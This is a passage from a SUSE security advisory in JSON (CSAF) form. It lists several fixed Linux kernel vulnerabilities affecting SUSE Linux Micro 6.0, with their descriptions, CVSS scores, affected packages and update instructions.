"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53831"
},
{
"cve": "CVE-2023-53834",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53834"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: ina2xx: avoid NULL pointer dereference on OF device match\n\nThe affected lines were resulting in a NULL pointer dereference on our\nplatform because the device tree contained the following list of\ncompatible strings:\n\n power-sensor@40 {\n compatible = \"ti,ina232\", \"ti,ina231\";\n ...\n };\n\nSince the driver doesn\u0027t declare a compatible string \"ti,ina232\", the OF\nmatching succeeds on \"ti,ina231\". But the I2C device ID info is\npopulated via the first compatible string, cf. modalias population in\nof_i2c_get_board_info(). Since there is no \"ina232\" entry in the legacy\nI2C device ID table either, the struct i2c_device_id *id pointer in the\nprobe function is NULL.\n\nFix this by using the already populated type variable instead, which\npoints to the proper driver data. Since the name is also wanted, add a\ngeneric one to the ina2xx_config table.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53834",
"url": "https://www.suse.com/security/cve/CVE-2023-53834"
},
{
"category": "external",
"summary": "SUSE Bug 1254660 for CVE-2023-53834",
"url": "https://bugzilla.suse.com/1254660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53834"
},
{
"cve": "CVE-2023-53836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53836"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Fix skb refcnt race after locking changes\n\nThere is a race where skb\u0027s from the sk_psock_backlog can be referenced\nafter userspace side has already skb_consumed() the sk_buff and its refcnt\ndropped to zer0 causing use after free.\n\nThe flow is the following:\n\n while ((skb = skb_peek(\u0026psock-\u003eingress_skb))\n sk_psock_handle_Skb(psock, skb, ..., ingress)\n if (!ingress) ...\n sk_psock_skb_ingress\n sk_psock_skb_ingress_enqueue(skb)\n msg-\u003eskb = skb\n sk_psock_queue_msg(psock, msg)\n skb_dequeue(\u0026psock-\u003eingress_skb)\n\nThe sk_psock_queue_msg() puts the msg on the ingress_msg queue. This is\nwhat the application reads when recvmsg() is called. An application can\nread this anytime after the msg is placed on the queue. The recvmsg hook\nwill also read msg-\u003eskb and then after user space reads the msg will call\nconsume_skb(skb) on it effectively free\u0027ing it.\n\nBut, the race is in above where backlog queue still has a reference to\nthe skb and calls skb_dequeue(). If the skb_dequeue happens after the\nuser reads and free\u0027s the skb we have a use after free.\n\nThe !ingress case does not suffer from this problem because it uses\nsendmsg_*(sk, msg) which does not pass the sk_buff further down the\nstack.\n\nThe following splat was observed with \u0027test_progs -t sockmap_listen\u0027:\n\n [ 1022.710250][ T2556] general protection fault, ...\n [...]\n [ 1022.712830][ T2556] Workqueue: events sk_psock_backlog\n [ 1022.713262][ T2556] RIP: 0010:skb_dequeue+0x4c/0x80\n [ 1022.713653][ T2556] Code: ...\n [...]\n [ 1022.720699][ T2556] Call Trace:\n [ 1022.720984][ T2556] \u003cTASK\u003e\n [ 1022.721254][ T2556] ? die_addr+0x32/0x80^M\n [ 1022.721589][ T2556] ? exc_general_protection+0x25a/0x4b0\n [ 1022.722026][ T2556] ? asm_exc_general_protection+0x22/0x30\n [ 1022.722489][ T2556] ? skb_dequeue+0x4c/0x80\n [ 1022.722854][ T2556] sk_psock_backlog+0x27a/0x300\n [ 1022.723243][ T2556] process_one_work+0x2a7/0x5b0\n [ 1022.723633][ T2556] worker_thread+0x4f/0x3a0\n [ 1022.723998][ T2556] ? __pfx_worker_thread+0x10/0x10\n [ 1022.724386][ T2556] kthread+0xfd/0x130\n [ 1022.724709][ T2556] ? __pfx_kthread+0x10/0x10\n [ 1022.725066][ T2556] ret_from_fork+0x2d/0x50\n [ 1022.725409][ T2556] ? __pfx_kthread+0x10/0x10\n [ 1022.725799][ T2556] ret_from_fork_asm+0x1b/0x30\n [ 1022.726201][ T2556] \u003c/TASK\u003e\n\nTo fix we add an skb_get() before passing the skb to be enqueued in the\nengress queue. This bumps the skb-\u003eusers refcnt so that consume_skb()\nand kfree_skb will not immediately free the sk_buff. With this we can\nbe sure the skb is still around when we do the dequeue. Then we just\nneed to decrement the refcnt or free the skb in the backlog case which\nwe do by calling kfree_skb() on the ingress case as well as the sendmsg\ncase.\n\nBefore locking change from fixes tag we had the sock locked so we\ncouldn\u0027t race with user and there was no issue here.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53836",
"url": "https://www.suse.com/security/cve/CVE-2023-53836"
},
{
"category": "external",
"summary": "SUSE Bug 1254693 for CVE-2023-53836",
"url": "https://bugzilla.suse.com/1254693"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53836"
},
{
"cve": "CVE-2023-53839",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53839"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndccp: fix data-race around dp-\u003edccps_mss_cache\n\ndccp_sendmsg() reads dp-\u003edccps_mss_cache before locking the socket.\nSame thing in do_dccp_getsockopt().\n\nAdd READ_ONCE()/WRITE_ONCE() annotations,\nand change dccp_sendmsg() to check again dccps_mss_cache\nafter socket is locked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53839",
"url": "https://www.suse.com/security/cve/CVE-2023-53839"
},
{
"category": "external",
"summary": "SUSE Bug 1254655 for CVE-2023-53839",
"url": "https://bugzilla.suse.com/1254655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53839"
},
{
"cve": "CVE-2023-53841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevlink: report devlink_port_type_warn source device\n\ndevlink_port_type_warn is scheduled for port devlink and warning\nwhen the port type is not set. But from this warning it is not easy\nfound out which device (driver) has no devlink port set.\n\n[ 3709.975552] Type was not set for devlink port.\n[ 3709.975579] WARNING: CPU: 1 PID: 13092 at net/devlink/leftover.c:6775 devlink_port_type_warn+0x11/0x20\n[ 3709.993967] Modules linked in: openvswitch nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nfnetlink bluetooth rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs vhost_net vhost vhost_iotlb tap tun bridge stp llc qrtr intel_rapl_msr intel_rapl_common i10nm_edac nfit libnvdimm x86_pkg_temp_thermal mlx5_ib intel_powerclamp coretemp dell_wmi ledtrig_audio sparse_keymap ipmi_ssif kvm_intel ib_uverbs rfkill ib_core video kvm iTCO_wdt acpi_ipmi intel_vsec irqbypass ipmi_si iTCO_vendor_support dcdbas ipmi_devintf mei_me ipmi_msghandler rapl mei intel_cstate isst_if_mmio isst_if_mbox_pci dell_smbios intel_uncore isst_if_common i2c_i801 dell_wmi_descriptor wmi_bmof i2c_smbus intel_pch_thermal pcspkr acpi_power_meter xfs libcrc32c sd_mod sg nvme_tcp mgag200 i2c_algo_bit nvme_fabrics drm_shmem_helper drm_kms_helper nvme syscopyarea ahci sysfillrect sysimgblt nvme_core fb_sys_fops crct10dif_pclmul libahci mlx5_core sfc crc32_pclmul nvme_common drm\n[ 3709.994030] crc32c_intel mtd t10_pi mlxfw libata tg3 mdio megaraid_sas psample ghash_clmulni_intel pci_hyperv_intf wmi dm_multipath sunrpc dm_mirror dm_region_hash dm_log dm_mod be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse\n[ 3710.108431] CPU: 1 PID: 13092 Comm: kworker/1:1 Kdump: loaded Not tainted 5.14.0-319.el9.x86_64 #1\n[ 3710.108435] Hardware name: Dell Inc. PowerEdge R750/0PJ80M, BIOS 1.8.2 09/14/2022\n[ 3710.108437] Workqueue: events devlink_port_type_warn\n[ 3710.108440] RIP: 0010:devlink_port_type_warn+0x11/0x20\n[ 3710.108443] Code: 84 76 fe ff ff 48 c7 03 20 0e 1a ad 31 c0 e9 96 fd ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 48 c7 c7 18 24 4e ad e8 ef 71 62 ff \u003c0f\u003e 0b c3 cc cc cc cc 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f6 87\n[ 3710.108445] RSP: 0018:ff3b6d2e8b3c7e90 EFLAGS: 00010282\n[ 3710.108447] RAX: 0000000000000000 RBX: ff366d6580127080 RCX: 0000000000000027\n[ 3710.108448] RDX: 0000000000000027 RSI: 00000000ffff86de RDI: ff366d753f41f8c8\n[ 3710.108449] RBP: ff366d658ff5a0c0 R08: ff366d753f41f8c0 R09: ff3b6d2e8b3c7e18\n[ 3710.108450] R10: 0000000000000001 R11: 0000000000000023 R12: ff366d753f430600\n[ 3710.108451] R13: ff366d753f436900 R14: 0000000000000000 R15: ff366d753f436905\n[ 3710.108452] FS: 0000000000000000(0000) GS:ff366d753f400000(0000) knlGS:0000000000000000\n[ 3710.108453] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 3710.108454] CR2: 00007f1c57bc74e0 CR3: 000000111d26a001 CR4: 0000000000773ee0\n[ 3710.108456] PKRU: 55555554\n[ 3710.108457] Call Trace:\n[ 3710.108458] \u003cTASK\u003e\n[ 3710.108459] process_one_work+0x1e2/0x3b0\n[ 3710.108466] ? rescuer_thread+0x390/0x390\n[ 3710.108468] worker_thread+0x50/0x3a0\n[ 3710.108471] ? rescuer_thread+0x390/0x390\n[ 3710.108473] kthread+0xdd/0x100\n[ 3710.108477] ? kthread_complete_and_exit+0x20/0x20\n[ 3710.108479] ret_from_fork+0x1f/0x30\n[ 3710.108485] \u003c/TASK\u003e\n[ 3710.108486] ---[ end trace 1b4b23cd0c65d6a0 ]---\n\nAfter patch:\n[ 402.473064] ice 0000:41:00.0: Type was not set for devlink port.\n[ 402.473064] ice 0000:41:00.1: Type was not set for devlink port.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53841",
"url": "https://www.suse.com/security/cve/CVE-2023-53841"
},
{
"category": "external",
"summary": "SUSE Bug 1255009 for CVE-2023-53841",
"url": "https://bugzilla.suse.com/1255009"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-53841"
},
{
"cve": "CVE-2023-53842",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53842"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd-mbhc-v2: fix resource leaks on component remove\n\nThe MBHC resources must be released on component probe failure and\nremoval so can not be tied to the lifetime of the component device.\n\nThis is specifically needed to allow probe deferrals of the sound card\nwhich otherwise fails when reprobing the codec component:\n\n snd-sc8280xp sound: ASoC: failed to instantiate card -517\n genirq: Flags mismatch irq 299. 00002001 (mbhc sw intr) vs. 00002001 (mbhc sw intr)\n wcd938x_codec audio-codec: Failed to request mbhc interrupts -16\n wcd938x_codec audio-codec: mbhc initialization failed\n wcd938x_codec audio-codec: ASoC: error at snd_soc_component_probe on audio-codec: -16\n snd-sc8280xp sound: ASoC: failed to instantiate card -16",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53842",
"url": "https://www.suse.com/security/cve/CVE-2023-53842"
},
{
"category": "external",
"summary": "SUSE Bug 1254690 for CVE-2023-53842",
"url": "https://bugzilla.suse.com/1254690"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53842"
},
{
"cve": "CVE-2023-53843",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53843"
}
],
"notes": [
{
"category": "general",
